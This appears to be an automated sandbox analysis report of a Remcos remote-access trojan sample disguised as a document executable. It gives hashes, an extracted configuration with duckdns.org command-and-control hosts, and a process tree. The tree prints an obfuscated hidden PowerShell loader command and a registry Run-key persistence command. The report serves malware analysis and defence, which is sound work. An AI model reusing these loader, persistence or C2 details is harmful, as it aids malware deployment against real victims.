Overview

overview

10

Static

static

1

DOCUMET788...@!.exe

windows7-x64

8

DOCUMET788...@!.exe

windows10-2004-x64

10

Flanr.fje

windows7-x64

3

Flanr.fje

windows10-2004-x64

3

Krieker213.ps1

windows7-x64

3

Krieker213.ps1

windows10-2004-x64

8

Modisterne.pse

windows7-x64

3

Modisterne.pse

windows10-2004-x64

3

Uncleanness.eug

windows7-x64

3

Uncleanness.eug

windows10-2004-x64

3

dendropogon.txt

windows7-x64

1

dendropogon.txt

windows10-2004-x64

1

hjemstedsk...ne.cel

windows7-x64

3

hjemstedsk...ne.cel

windows10-2004-x64

3

olieraffin...rs.fat

windows7-x64

3

olieraffin...rs.fat

windows10-2004-x64

3

Analysis

  • max time kernel
    147s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    16/01/2025, 08:58

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    DOCUMET7887RAMADA@#$@!.exe

  • Size

    1.2MB

  • MD5

    6dbfced7845c936a56c3685329dc24d9

  • SHA1

    416db985d9b8defa1b99d17956aae3d767d9d92b

  • SHA256

    304947e91f66751b25d0899c7b9feffe43a5620b13fd5de4a8c5642d638ce45f

  • SHA512

    9ca83f6d19299abdfa872713d3646737e6319ef4c422d0af7c9bbd237a199f058126f05a451c91057970ac000d885b35b34fd3d46307947ee67847af6dca96f4

  • SSDEEP

    24576:myZDPLNLlTznkEU9gld5cYSOXQkPoNW+8pwcyLy2wFV3y:PrLlTgEcgzXX1PYAFn3y

Score
10/10
remcossentdiscoveryexecutionpersistencerat

Malware Config

Extracted

Family

remcos

Botnet

Sent

C2

haleleeh8iuoty1.duckdns.org:8347

haleleeh8iuoty1.duckdns.org:37830

haleleeh8iuoty2.duckdns.org:8347

haleleeh8iuoty3.duckdns.org:8347

haleleeh8iuoty4.duckdns.org:8347
Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    true

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    kmirtup.dat

  • keylog_flag

    false

  • keylog_path

    %AppData%

  • mouse_option

    false

  • mutex

    aksoetuise-Y9DD4X

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • startup_value

    

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Remcos family
    remcos
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Blocklisted process makes network request 7 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Drops file in Program Files directory 1 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 22 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 13 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\DOCUMET7887RAMADA@#$@!.exe
    "C:\Users\Admin\AppData\Local\Temp\DOCUMET7887RAMADA@#$@!.exe"
    1⤵
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:1528
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -windowstyle hidden "$Dynamik=GC -raw 'C:\Users\Admin\AppData\Roaming\Brixvold\reclusely\Krieker213.Fla';$balsal=$Dynamik.SubString(57497,3);.$balsal($Dynamik)"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4764
      • C:\Windows\SysWOW64\msiexec.exe
        "C:\Windows\SysWOW64\msiexec.exe"
        3⤵
        • Blocklisted process makes network request
        • Suspicious use of NtCreateThreadExHideFromDebugger
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:4844
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bemixt" /t REG_EXPAND_SZ /d "%Teknologiseringerne% -windowstyle 1 $Graensefunktion=(Get-Item 'HKCU:\Software\Genindlggelsen\').GetValue('Pvc');%Teknologiseringerne% ($Graensefunktion)"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:5076
          • C:\Windows\SysWOW64\reg.exe
            REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bemixt" /t REG_EXPAND_SZ /d "%Teknologiseringerne% -windowstyle 1 $Graensefunktion=(Get-Item 'HKCU:\Software\Genindlggelsen\').GetValue('Pvc');%Teknologiseringerne% ($Graensefunktion)"
            5⤵
            • Adds Run key to start application
            • System Location Discovery: System Language Discovery
            • Modifies registry key
            PID:3860

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_eu4ounpo.lvr.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Brixvold\reclusely\Flanr.fje
    Filesize

    331KB

    MD5

    06acea567a0ded05680dbb9de58d0311

    SHA1

    e84e2cde7049ce616b5cc579ce4b4d837423e586

    SHA256

    fd3f116786b5db01589d0460c9e1ffccdc468237ee2db9941482c904bc20500b

    SHA512

    e5c9492b5c49f75c92f45c9b577d67854d989e5672cfc3c2f8b4e831b00082f180834080e398bef69dcd0d3611d4404879e4b6ee9ef57afb2c421ea7f422bc14

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Brixvold\reclusely\Krieker213.Fla
    Filesize

    56KB

    MD5

    71ec49d3afc6876b0238400570d4028d

    SHA1

    e661e5ca92fa77b576dd75c8d981936b2db5be88

    SHA256

    178d63022c2e5d42cd6f8dd983b8a4a19568e1370efad6c9c51f4b8807964885

    SHA512

    dae10533f8b54e5dcd1e929a2af3270f201e22566961d27ef4c52ad359b821a4b95bab5469047fe61271111876208833450010d8cf1ce9bd73edcd829d6f21e2

    Download Submit

  • memory/4764-52-0x0000000007E20000-0x0000000007E3A000-memory.dmp

    Filesize

    104KB

    Download

  • memory/4764-48-0x0000000007D60000-0x0000000007D6A000-memory.dmp

    Filesize

    40KB

    Download

  • memory/4764-12-0x00000000060C0000-0x0000000006126000-memory.dmp

    Filesize

    408KB

    Download

  • memory/4764-10-0x0000000005920000-0x0000000005F48000-memory.dmp

    Filesize

    6.2MB

    Download

  • memory/4764-13-0x0000000006130000-0x0000000006196000-memory.dmp

    Filesize

    408KB

    Download

  • memory/4764-23-0x00000000062A0000-0x00000000065F4000-memory.dmp

    Filesize

    3.3MB

    Download

  • memory/4764-24-0x00000000067E0000-0x00000000067FE000-memory.dmp

    Filesize

    120KB

    Download

  • memory/4764-25-0x0000000006820000-0x000000000686C000-memory.dmp

    Filesize

    304KB

    Download

  • memory/4764-26-0x0000000006D50000-0x0000000006DE6000-memory.dmp

    Filesize

    600KB

    Download

  • memory/4764-27-0x0000000006D00000-0x0000000006D1A000-memory.dmp

    Filesize

    104KB

    Download

  • memory/4764-28-0x00000000077E0000-0x0000000007802000-memory.dmp

    Filesize

    136KB

    Download

  • memory/4764-29-0x0000000007E40000-0x00000000083E4000-memory.dmp

    Filesize

    5.6MB

    Download

  • memory/4764-9-0x0000000073D10000-0x00000000744C0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/4764-31-0x0000000008A70000-0x00000000090EA000-memory.dmp

    Filesize

    6.5MB

    Download

  • memory/4764-33-0x0000000073D10000-0x00000000744C0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/4764-34-0x00000000701A0000-0x00000000701EC000-memory.dmp

    Filesize

    304KB

    Download

  • memory/4764-32-0x0000000007BF0000-0x0000000007C22000-memory.dmp

    Filesize

    200KB

    Download

  • memory/4764-44-0x0000000007C30000-0x0000000007C4E000-memory.dmp

    Filesize

    120KB

    Download

  • memory/4764-45-0x0000000007C60000-0x0000000007D03000-memory.dmp

    Filesize

    652KB

    Download

  • memory/4764-46-0x0000000073D10000-0x00000000744C0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/4764-47-0x0000000073D10000-0x00000000744C0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/4764-55-0x00000000085C0000-0x00000000085E4000-memory.dmp

    Filesize

    144KB

    Download

  • memory/4764-49-0x0000000007D80000-0x0000000007D91000-memory.dmp

    Filesize

    68KB

    Download

  • memory/4764-50-0x0000000007DD0000-0x0000000007DDE000-memory.dmp

    Filesize

    56KB

    Download

  • memory/4764-51-0x0000000007DE0000-0x0000000007DF4000-memory.dmp

    Filesize

    80KB

    Download

  • memory/4764-7-0x0000000073D1E000-0x0000000073D1F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/4764-11-0x00000000057B0000-0x00000000057D2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/4764-54-0x0000000008590000-0x00000000085BA000-memory.dmp

    Filesize

    168KB

    Download

  • memory/4764-53-0x0000000007E10000-0x0000000007E18000-memory.dmp

    Filesize

    32KB

    Download

  • memory/4764-56-0x0000000073D10000-0x00000000744C0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/4764-58-0x0000000073D1E000-0x0000000073D1F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/4764-59-0x0000000073D10000-0x00000000744C0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/4764-60-0x0000000073D10000-0x00000000744C0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/4764-8-0x0000000005190000-0x00000000051C6000-memory.dmp

    Filesize

    216KB

    Download

  • memory/4764-62-0x0000000073D10000-0x00000000744C0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/4764-64-0x0000000073D10000-0x00000000744C0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/4764-63-0x00000000090F0000-0x000000000ACEF000-memory.dmp

    Filesize

    28.0MB

    Download

  • memory/4764-65-0x0000000073D10000-0x00000000744C0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/4764-66-0x0000000073D10000-0x00000000744C0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/4844-94-0x0000000001250000-0x00000000024A4000-memory.dmp

    Filesize

    18.3MB

    Download

  • memory/4844-97-0x0000000001250000-0x00000000024A4000-memory.dmp

    Filesize

    18.3MB

    Download

  • memory/4844-86-0x0000000001250000-0x00000000024A4000-memory.dmp

    Filesize

    18.3MB

    Download

  • memory/4844-88-0x0000000001250000-0x00000000024A4000-memory.dmp

    Filesize

    18.3MB

    Download

  • memory/4844-89-0x0000000001250000-0x00000000024A4000-memory.dmp

    Filesize

    18.3MB

    Download

  • memory/4844-79-0x0000000001250000-0x00000000024A4000-memory.dmp

    Filesize

    18.3MB

    Download

  • memory/4844-93-0x0000000001250000-0x00000000024A4000-memory.dmp

    Filesize

    18.3MB

    Download

  • memory/4844-92-0x0000000001250000-0x00000000024A4000-memory.dmp

    Filesize

    18.3MB

    Download

  • memory/4844-83-0x0000000001250000-0x00000000024A4000-memory.dmp

    Filesize

    18.3MB

    Download

  • memory/4844-91-0x0000000001250000-0x00000000024A4000-memory.dmp

    Filesize

    18.3MB

    Download

  • memory/4844-95-0x0000000001250000-0x00000000024A4000-memory.dmp

    Filesize

    18.3MB

    Download

  • memory/4844-96-0x0000000001250000-0x00000000024A4000-memory.dmp

    Filesize

    18.3MB

    Download

  • memory/4844-90-0x0000000001250000-0x00000000024A4000-memory.dmp

    Filesize

    18.3MB

    Download

  • memory/4844-98-0x0000000001250000-0x00000000024A4000-memory.dmp

    Filesize

    18.3MB

    Download